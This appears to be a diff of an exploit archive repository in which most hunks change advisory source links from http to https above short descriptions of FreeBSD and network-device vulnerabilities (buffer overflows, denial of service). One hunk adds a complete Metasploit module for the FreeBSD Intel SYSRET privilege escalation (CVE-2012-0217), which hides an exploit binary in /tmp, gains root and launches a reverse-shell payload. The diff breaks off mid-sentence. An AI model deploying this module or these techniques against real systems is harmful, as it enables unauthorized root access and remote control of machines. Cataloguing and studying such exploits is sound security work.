the BSD UNIX Operating System. It is developed and maintained by the FreeBSD Project. diff --git a/exploits/freebsd/local/21176.c b/exploits/freebsd/local/21176.c index d956d9d13..9271a7d52 100644 --- a/exploits/freebsd/local/21176.c +++ b/exploits/freebsd/local/21176.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3661/info +// source: https://www.securityfocus.com/bid/3661/info aio.h is a library implementing the POSIX standard for asynchronous I/O. Support for AIO may be enabled in FreeBSD by compiling the kernel with the VFS_AIO option. This option is not enabled in the default kernel configuration. diff --git a/exploits/freebsd/local/21462.sh b/exploits/freebsd/local/21462.sh index 474730811..4bd123d92 100755 --- a/exploits/freebsd/local/21462.sh +++ b/exploits/freebsd/local/21462.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4768/info +source: https://www.securityfocus.com/bid/4768/info In FreeBSD, setting kern.ps_showallprocs=0 via the sysctl call is meant to disable normal users from seeing any running processes that are not owned by them. The current implementation of this feature fails to protest system process information. diff --git a/exploits/freebsd/local/21798.txt b/exploits/freebsd/local/21798.txt index ae22e2ad3..ffdebda3b 100644 --- a/exploits/freebsd/local/21798.txt +++ b/exploits/freebsd/local/21798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5718/info +source: https://www.securityfocus.com/bid/5718/info It has been reported that wmmon is vulnerable to a leakage of open file descriptors that may result in unauthorized disclosure of kernel memory. It is allegedly possible for attackers to inherit the open file descriptors for /dev/mem and /dev/kmem by executing a malicious program through wmmon. The program that is executed can be specified by the attacker at the command line. diff --git a/exploits/freebsd/local/21799.txt b/exploits/freebsd/local/21799.txt index 037683011..71fed68f4 100644 --- a/exploits/freebsd/local/21799.txt +++ b/exploits/freebsd/local/21799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5719/info +source: https://www.securityfocus.com/bid/5719/info It has been reported that wmnet2 is vulnerable to a leakage of open file descriptors that may result in unauthorized disclosure of kernel memory. It is allegedly possible for attackers to inherit the open file descriptors for /dev/mem and /dev/kmem by executing a malicious program through wmnet2. The program that is executed can be specified by the attacker at the command line. diff --git a/exploits/freebsd/local/22566.pl b/exploits/freebsd/local/22566.pl index fbdf90cf7..3d50410c1 100755 --- a/exploits/freebsd/local/22566.pl +++ b/exploits/freebsd/local/22566.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7503/info +source: https://www.securityfocus.com/bid/7503/info It has been reported that youbin is vulnerable to a locally exploitable buffer overflow. The problem is said to occur while processing environment variables. Specifically, an internal memory buffer may be overrun while handling a HOME environment variable containing excessive data. This condition may be exploited by attackers to ultimately execute instructions with the privileges of the youbin process, typically root. diff --git a/exploits/freebsd/local/22573.pl b/exploits/freebsd/local/22573.pl index da2346f46..a5047739e 100755 --- a/exploits/freebsd/local/22573.pl +++ b/exploits/freebsd/local/22573.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7533/info +source: https://www.securityfocus.com/bid/7533/info ListProc catmail has been reported prone to a buffer overflow vulnerability when handling a ULISTPROC_UMASK environment variable of excessive length. diff --git a/exploits/freebsd/local/22574.pl b/exploits/freebsd/local/22574.pl index 3ba37d496..8c1c49d05 100755 --- a/exploits/freebsd/local/22574.pl +++ b/exploits/freebsd/local/22574.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7537/info +source: https://www.securityfocus.com/bid/7537/info A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges. diff --git a/exploits/freebsd/local/22580.c b/exploits/freebsd/local/22580.c index ee9f42a10..c044014c7 100644 --- a/exploits/freebsd/local/22580.c +++ b/exploits/freebsd/local/22580.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7546/info +// source: https://www.securityfocus.com/bid/7546/info Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbase is prone to this issue also. diff --git a/exploits/freebsd/local/22613.pl b/exploits/freebsd/local/22613.pl index c709b512d..7c4c5b9bb 100755 --- a/exploits/freebsd/local/22613.pl +++ b/exploits/freebsd/local/22613.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7630/info +source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/freebsd/local/22614.c b/exploits/freebsd/local/22614.c index 0b69edfd0..e9e4d932f 100644 --- a/exploits/freebsd/local/22614.c +++ b/exploits/freebsd/local/22614.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7630/info +// source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/freebsd/local/22615.c b/exploits/freebsd/local/22615.c index d73b713ec..2f954566a 100644 --- a/exploits/freebsd/local/22615.c +++ b/exploits/freebsd/local/22615.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7630/info +// source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/freebsd/local/22661.c b/exploits/freebsd/local/22661.c index 65e6f62af..30f2fcd6e 100644 --- a/exploits/freebsd/local/22661.c +++ b/exploits/freebsd/local/22661.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7703/info +// source: https://www.securityfocus.com/bid/7703/info upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length. diff --git a/exploits/freebsd/local/32946.c b/exploits/freebsd/local/32946.c index 6ed4cece2..26932b1db 100644 --- a/exploits/freebsd/local/32946.c +++ b/exploits/freebsd/local/32946.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34666/info +// source: https://www.securityfocus.com/bid/34666/info FreeBSD is prone to a local information-disclosure vulnerability. diff --git a/exploits/freebsd/remote/15723.c b/exploits/freebsd/remote/15723.pl old mode 100644 new mode 100755 similarity index 100% rename from exploits/freebsd/remote/15723.c rename to exploits/freebsd/remote/15723.pl diff --git a/exploits/freebsd/remote/20292.pl b/exploits/freebsd/remote/20292.pl index c13488785..051346ee3 100755 --- a/exploits/freebsd/remote/20292.pl +++ b/exploits/freebsd/remote/20292.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1804/info +source: https://www.securityfocus.com/bid/1804/info Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). diff --git a/exploits/freebsd/remote/20732.pl b/exploits/freebsd/remote/20732.pl index 28bf65a0c..09744e008 100755 --- a/exploits/freebsd/remote/20732.pl +++ b/exploits/freebsd/remote/20732.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2548/info +source: https://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users. diff --git a/exploits/freebsd/remote/20941.pl b/exploits/freebsd/remote/20941.pl index 27bc40996..c39c8e081 100755 --- a/exploits/freebsd/remote/20941.pl +++ b/exploits/freebsd/remote/20941.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2895/info +source: https://www.securityfocus.com/bid/2895/info W3M is a pager/text-based WWW browser similiar to lynx. diff --git a/exploits/freebsd/remote/21614.c b/exploits/freebsd/remote/21614.c index 2155974f6..fff73fee3 100644 --- a/exploits/freebsd/remote/21614.c +++ b/exploits/freebsd/remote/21614.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5215/info +source: https://www.securityfocus.com/bid/5215/info ATPhttpd is a small webserver designed for high-performance. It was developed by Yann Ramin. diff --git a/exploits/freebsd/remote/22832.pl b/exploits/freebsd/remote/22832.pl index b996fa53b..b101aa2a4 100755 --- a/exploits/freebsd/remote/22832.pl +++ b/exploits/freebsd/remote/22832.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8022/info +source: https://www.securityfocus.com/bid/8022/info GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible. diff --git a/exploits/freebsd/remote/22890.pl b/exploits/freebsd/remote/22890.pl index 588e9ab49..f0ce225d0 100755 --- a/exploits/freebsd/remote/22890.pl +++ b/exploits/freebsd/remote/22890.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8160/info +source: https://www.securityfocus.com/bid/8160/info A buffer overflow vulnerability has been reported in cftp. The vulnerability occurs when cftp is parsing 'Welcome' banner messages from remote FTP servers. When cftp receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client. diff --git a/exploits/freebsd/remote/22891.pl b/exploits/freebsd/remote/22891.pl index 378053fda..221d59b0a 100755 --- a/exploits/freebsd/remote/22891.pl +++ b/exploits/freebsd/remote/22891.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8161/info +source: https://www.securityfocus.com/bid/8161/info A buffer overflow vulnerability has been reported in IglooFTP. The vulnerability occurs when IglooFTP is parsing 'Welcome' banner messages from remote FTP servers. When IglooFTP receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client. diff --git a/exploits/freebsd/remote/22976.pl b/exploits/freebsd/remote/22976.pl index b13e5dfce..3137dc164 100755 --- a/exploits/freebsd/remote/22976.pl +++ b/exploits/freebsd/remote/22976.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8315/info +source: https://www.securityfocus.com/bid/8315/info The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable. diff --git a/exploits/freebsd/remote/25687.c b/exploits/freebsd/remote/25687.c index df164cc1b..6318da4d0 100644 --- a/exploits/freebsd/remote/25687.c +++ b/exploits/freebsd/remote/25687.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13698/info +// source: https://www.securityfocus.com/bid/13698/info Picasm is affected by a remote buffer overflow vulnerability. diff --git a/exploits/freebsd_x86-64/local/46508.rb b/exploits/freebsd_x86-64/local/46508.rb new file mode 100755 index 000000000..7f9624114 --- /dev/null +++ b/exploits/freebsd_x86-64/local/46508.rb @@ -0,0 +1,181 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation', + 'Description' => %q{ + This module exploits a vulnerability in the FreeBSD kernel, + when running on 64-bit Intel processors. + + By design, 64-bit processors following the X86-64 specification will + trigger a general protection fault (GPF) when executing a SYSRET + instruction with a non-canonical address in the RCX register. + + However, Intel processors check for a non-canonical address prior to + dropping privileges, causing a GPF in privileged mode. As a result, + the current userland RSP stack pointer is restored and executed, + resulting in privileged code execution. + + This module has been tested successfully on: + + FreeBSD 8.3-RELEASE (amd64); and + FreeBSD 9.0-RELEASE (amd64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Rafal Wojtczuk', # Discovery + 'John Baldwin', # Discovery + 'iZsh', # Exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2012-06-12', + 'Platform' => ['bsd'], + 'Arch' => [ARCH_X64], + 'SessionTypes' => ['shell'], + 'References' => + [ + ['BID', '53856'], + ['CVE', '2012-0217'], + ['EDB', '28718'], + ['PACKETSTORM', '113584'], + ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'], + ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'], + ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'], + ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'], + ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'], + ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation'] + ], + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, + 'DefaultTarget' => 0)) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data, gcc_args='') + upload "#{path}.c", data + + gcc_cmd = "gcc -o #{path} #{path}.c" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + output = cmd_exec gcc_cmd + + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + register_file_for_cleanup path + chmod path + end + + def exploit_data(file) + ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file) + end + + def is_root? + (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0') + end + + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + + def check + kernel_release = cmd_exec('uname -r').to_s + unless kernel_release =~ /^(8\.3|9\.0)-RELEASE/ + vprint_error "FreeBSD version #{kernel_release} is not vulnerable" + return Exploit::CheckCode::Safe + end + vprint_good "FreeBSD version #{kernel_release} appears vulnerable" + + arch = cmd_exec('uname -m').to_s + unless arch.include? '64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + hw_model = cmd_exec('/sbin/sysctl hw.model').to_s + unless hw_model.downcase.include? 'intel' + vprint_error "#{hw_model} is not vulnerable" + return CheckCode::Safe + end + vprint_good "#{hw_model} is vulnerable" + + CheckCode::Appears + end + + def exploit + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload and compile exploit executable + executable_name = ".#{rand_text_alphanumeric 5..10}" + executable_path = "#{base_dir}/#{executable_name}" + upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall' + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + output = cmd_exec executable_path + output.each_line { |line| vprint_status line.chomp } + + unless is_root? + fail_with Failure::Unknown, 'Exploitation failed' + end + print_good "Success! Executing payload..." + + cmd_exec payload_path + end +end \ No newline at end of file diff --git a/exploits/hardware/dos/19436.txt b/exploits/hardware/dos/19436.txt index 9854f23fb..180c51ea8 100644 --- a/exploits/hardware/dos/19436.txt +++ b/exploits/hardware/dos/19436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/549/info +source: https://www.securityfocus.com/bid/549/info A denial of service condition exists in some implementations of Firewall-1 by Checkpoint Software. This denial of service attack is possible due to the way Firewall-1 handles TCP connections. diff --git a/exploits/hardware/dos/19441.c b/exploits/hardware/dos/19441.c index 6f0c2822e..d6fd0405c 100644 --- a/exploits/hardware/dos/19441.c +++ b/exploits/hardware/dos/19441.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/556/info +// source: https://www.securityfocus.com/bid/556/info There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables. diff --git a/exploits/hardware/dos/19477.txt b/exploits/hardware/dos/19477.txt index 41c489f1f..1d8bff9fa 100644 --- a/exploits/hardware/dos/19477.txt +++ b/exploits/hardware/dos/19477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/613/info +source: https://www.securityfocus.com/bid/613/info TFS Gateway 4.0, when configured in a specific non-default manner, is vulnerable to a remotely exploitable denial of service attack. If 'return entire message to sender' is enabled for failed send attempts, and an email is sent to the TFS Gateway with 1: the From: address set to an invalid address on a remote machine and 2: an invalid To: address on the target machine, the gateway will attempt to return the complete message once every 10 seconds until an administrator manually stops it. If enough emails of sufficient size of this nature are sent it can lead to a degradation or denial of service. diff --git a/exploits/hardware/dos/19513.txt b/exploits/hardware/dos/19513.txt index 3a2972c7c..e80dc001c 100644 --- a/exploits/hardware/dos/19513.txt +++ b/exploits/hardware/dos/19513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/665/info +source: https://www.securityfocus.com/bid/665/info A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock up the modem requiring a hard reset. diff --git a/exploits/hardware/dos/19531.txt b/exploits/hardware/dos/19531.txt index 7bd57a40b..ee08678f3 100644 --- a/exploits/hardware/dos/19531.txt +++ b/exploits/hardware/dos/19531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/675/info +source: https://www.securityfocus.com/bid/675/info Cisco devices running classic IOS are reported prone to a denial of service vulnerability. The issue occurs when a vulnerable device receives and processes a UDP packet on UDP port 514 for syslog. This issue results in a crash or hang requiring a reboot. diff --git a/exploits/hardware/dos/19766.txt b/exploits/hardware/dos/19766.txt index fe575ea72..21235ac2a 100644 --- a/exploits/hardware/dos/19766.txt +++ b/exploits/hardware/dos/19766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1009/info +source: https://www.securityfocus.com/bid/1009/info A vulnerability exists in the Nortel/Bay Networks Nautica Marlin router pruduct. Sending a 0 byte UDP packet to port 161 (SNMP) to one of these routers will cause it to crash. This attack can be trivially performed using NMAP or other UDP port scanner. diff --git a/exploits/hardware/dos/19919.c b/exploits/hardware/dos/19919.c index 1074613ef..7979537f1 100644 --- a/exploits/hardware/dos/19919.c +++ b/exploits/hardware/dos/19919.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1211/info +// source: https://www.securityfocus.com/bid/1211/info Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack. diff --git a/exploits/hardware/dos/19923.txt b/exploits/hardware/dos/19923.txt index a39d6c4c6..56dbd303c 100644 --- a/exploits/hardware/dos/19923.txt +++ b/exploits/hardware/dos/19923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1219/info +source: https://www.securityfocus.com/bid/1219/info Large usernames or passwords sent to the router's HTTP interface restart the router. Router log will show "restart not in response to admin command" diff --git a/exploits/hardware/dos/20050.c b/exploits/hardware/dos/20050.c index cb4cdffe8..f0ca86200 100644 --- a/exploits/hardware/dos/20050.c +++ b/exploits/hardware/dos/20050.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1419/info +// source: https://www.securityfocus.com/bid/1419/info If Checkpoint Firewall-1 receives a number of spoofed UDP packets with Source IP = Destination IP, the firewall (and likely the machine hosting it) crashes. diff --git a/exploits/hardware/dos/20090.txt b/exploits/hardware/dos/20090.txt index d5fc04d0a..a3795f5be 100644 --- a/exploits/hardware/dos/20090.txt +++ b/exploits/hardware/dos/20090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1491/info +source: https://www.securityfocus.com/bid/1491/info HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality. diff --git a/exploits/hardware/dos/20323.txt b/exploits/hardware/dos/20323.txt index b4d1248ef..6b96d9340 100644 --- a/exploits/hardware/dos/20323.txt +++ b/exploits/hardware/dos/20323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1838/info +source: https://www.securityfocus.com/bid/1838/info Cisco devices running IOS software may be prone to a denial of service attack if a URL containing a question mark followed by a slash (?/) is requested. The device will enter an infinite loop when supplied with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be required in order to regain normal functionality. diff --git a/exploits/hardware/dos/20328.txt b/exploits/hardware/dos/20328.txt index f3875e4a5..2a1ecf7b2 100644 --- a/exploits/hardware/dos/20328.txt +++ b/exploits/hardware/dos/20328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1844/info +source: https://www.securityfocus.com/bid/1844/info A buffer overflow exists in the Intel InBusiness eMail Station, a dedicated email device. When attempting to establish a connection, the username submitted to the device is not properly filtered for length. By supplying a string for USER of approximately 620 characters in length, it is possible for a remote attacker to overflow the relevant buffer. The device will halt in response, requiring the unit to be powered down and restarted. In addition to this denial of service, an attacker sufficiently familiar with the hardware architecture and firmware of this platform may, potentially, be able to exploit this overflow to place malicious machine code on the stack, permitting interference with or modification of the device's software, interception of messages, or another compromise of the unit's normal function. diff --git a/exploits/hardware/dos/20331.c b/exploits/hardware/dos/20331.c index 476686032..7f33f377a 100644 --- a/exploits/hardware/dos/20331.c +++ b/exploits/hardware/dos/20331.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1855/info +source: https://www.securityfocus.com/bid/1855/info A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. diff --git a/exploits/hardware/dos/20332.pl b/exploits/hardware/dos/20332.pl index eff1b7e88..07528cfde 100755 --- a/exploits/hardware/dos/20332.pl +++ b/exploits/hardware/dos/20332.pl @@ -1,5 +1,5 @@ # -#source: http://www.securityfocus.com/bid/1855/info +#source: https://www.securityfocus.com/bid/1855/info # #A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 #or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. # diff --git a/exploits/hardware/dos/20473.pl b/exploits/hardware/dos/20473.pl index c96148466..f857a3bb0 100755 --- a/exploits/hardware/dos/20473.pl +++ b/exploits/hardware/dos/20473.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2072/info +source: https://www.securityfocus.com/bid/2072/info Cisco Catalyst is a high speed switch implemented in local area networks. diff --git a/exploits/hardware/dos/20487.pl b/exploits/hardware/dos/20487.pl index 97c9361bc..6ee00365e 100755 --- a/exploits/hardware/dos/20487.pl +++ b/exploits/hardware/dos/20487.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2082/info +source: https://www.securityfocus.com/bid/2082/info The SOHO 2.2 is a popular SOHO firewall by Watchguard Technologies Inc. diff --git a/exploits/hardware/dos/20509.pl b/exploits/hardware/dos/20509.pl index e96a6b96d..810c1735c 100755 --- a/exploits/hardware/dos/20509.pl +++ b/exploits/hardware/dos/20509.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2117/info +source: https://www.securityfocus.com/bid/2117/info Software versions 6.1(1), 6.1(1a) and 6.1(1b) for Catalyst 4000, 5000, and 6000 devices that support SSH and 3 DES encryption contain a vulnerability that may allow an attacker to cause a denial of service. diff --git a/exploits/hardware/dos/20644.c b/exploits/hardware/dos/20644.c index b20d2f04c..b485d65d5 100644 --- a/exploits/hardware/dos/20644.c +++ b/exploits/hardware/dos/20644.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2400/info +// source: https://www.securityfocus.com/bid/2400/info ASX-1000 Switches are hardware packages developed by Marconi Corporation. ASX-1000 Switches can be used to regulate ATM networks, performing layer-3 switching. diff --git a/exploits/hardware/dos/20654.pl b/exploits/hardware/dos/20654.pl index c2f22f7a5..683e48f00 100755 --- a/exploits/hardware/dos/20654.pl +++ b/exploits/hardware/dos/20654.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2430/info +source: https://www.securityfocus.com/bid/2430/info Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP. diff --git a/exploits/hardware/dos/20734.sh b/exploits/hardware/dos/20734.sh index cb0c3f7b3..ff59c49f0 100755 --- a/exploits/hardware/dos/20734.sh +++ b/exploits/hardware/dos/20734.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2551/info +source: https://www.securityfocus.com/bid/2551/info PIX is an enterprise firewall engineered and maintained by Cisco Systems. It is designed to provide robust features and multiple methods of access control and filtering. diff --git a/exploits/hardware/dos/20821.txt b/exploits/hardware/dos/20821.txt index 6f871c794..264a172c4 100644 --- a/exploits/hardware/dos/20821.txt +++ b/exploits/hardware/dos/20821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2684/info +source: https://www.securityfocus.com/bid/2684/info Hot Standby Routing Protocol is an Internet Protocol based routing protocol implemented by Cisco Systems. It is designed to offer traffic rerouting services to networks when one router within a pool ceases to operate, and users of the network segment aren't using ICMP Router Discovery Protocol to find the new router handling traffic for their segment. diff --git a/exploits/hardware/dos/20824.txt b/exploits/hardware/dos/20824.txt index a02885483..899283de1 100644 --- a/exploits/hardware/dos/20824.txt +++ b/exploits/hardware/dos/20824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2689/info +source: https://www.securityfocus.com/bid/2689/info The Catalyst series switch is a scalable, high performance layers 2 and 3 switch manufactured by Cisco Systems. The Catalyst series ranges in size, and is designed for use in organizations sized from small business to large enterprise. diff --git a/exploits/hardware/dos/20847.c b/exploits/hardware/dos/20847.c index 1268b9fcd..78fe62d8b 100644 --- a/exploits/hardware/dos/20847.c +++ b/exploits/hardware/dos/20847.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2721/info +// source: https://www.securityfocus.com/bid/2721/info OfficeConnect 812 is a DSL router manufactured by 3Com, and distributed by numerous DSL providers. OfficeConnect 812 is an integrated ADSL router with an onboard 4 port switch. diff --git a/exploits/hardware/dos/21028.pl b/exploits/hardware/dos/21028.pl index 1045027b8..835690480 100755 --- a/exploits/hardware/dos/21028.pl +++ b/exploits/hardware/dos/21028.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3096/info +source: https://www.securityfocus.com/bid/3096/info A potential denial of service condition may exist in Cisco's IOS firmware. diff --git a/exploits/hardware/dos/21092.txt b/exploits/hardware/dos/21092.txt index 74caa4435..875e1de2b 100644 --- a/exploits/hardware/dos/21092.txt +++ b/exploits/hardware/dos/21092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3236/info +source: https://www.securityfocus.com/bid/3236/info CBOS is the Cisco Broadband Operating System, firmware designed for use on Cisco 600 series routers. It is maintained and distributed by Cisco Systems. diff --git a/exploits/hardware/dos/21103.c b/exploits/hardware/dos/21103.c index 432981fad..d656497f4 100644 --- a/exploits/hardware/dos/21103.c +++ b/exploits/hardware/dos/21103.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3306/info +// source: https://www.securityfocus.com/bid/3306/info The DLink Dl-704 is a DSL/Cable router and switch designed for home network use. diff --git a/exploits/hardware/dos/21296.c b/exploits/hardware/dos/21296.c index 61cab6048..7a60f6c91 100644 --- a/exploits/hardware/dos/21296.c +++ b/exploits/hardware/dos/21296.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4132/info +// source: https://www.securityfocus.com/bid/4132/info Cisco products contain multiple vulnerabilities in handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089), however more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities. diff --git a/exploits/hardware/dos/21465.txt b/exploits/hardware/dos/21465.txt index 6f5010c85..b600c94be 100644 --- a/exploits/hardware/dos/21465.txt +++ b/exploits/hardware/dos/21465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4786/info +source: https://www.securityfocus.com/bid/4786/info IOS is the Internet Operating System, used on Cisco routers. It is distributed and maintained by Cisco. diff --git a/exploits/hardware/dos/21472.pl b/exploits/hardware/dos/21472.pl index 60c43c8ad..e811c184b 100755 --- a/exploits/hardware/dos/21472.pl +++ b/exploits/hardware/dos/21472.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4815/info +source: https://www.securityfocus.com/bid/4815/info Cisco Broadband Operating System (CBOS) is the operating system used on Cisco 600 series routers. diff --git a/exploits/hardware/dos/21561.txt b/exploits/hardware/dos/21561.txt index 3c483d2a7..3c9a0c344 100644 --- a/exploits/hardware/dos/21561.txt +++ b/exploits/hardware/dos/21561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5034/info +source: https://www.securityfocus.com/bid/5034/info ZyXEL 642R routers have difficulties handling certain types of malformed packets. In particular, it is possible to deny services by sending a vulnerable 